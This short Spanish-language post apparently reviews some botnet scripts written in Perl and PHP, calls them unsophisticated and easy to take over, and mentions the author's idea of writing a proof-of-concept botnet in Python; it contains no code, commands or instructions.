Está un poco mejor shell99, pero tampoco está mal; lo que sí es que se ve que han tenido tiempo no para desarrollar sino para encontrar los scripts y usarlos. Interesante: se ve que hay una o 2 personas que más o menos le dan a la codificación en Perl y un poco en PHP, pero en realidad las botnets no están muy desarrolladas.
Está decente el botnet, se puede tomar control de ella y obviamente no hacen mucho por generar una botnet más compleja y más grande; sin embargo, me da la idea para desarrollar una de prueba de concepto durante estas fechas que ando de relax, programando en Python para pruebas de volumen.
Bueno despues de tanto codigo .. me lanzo ….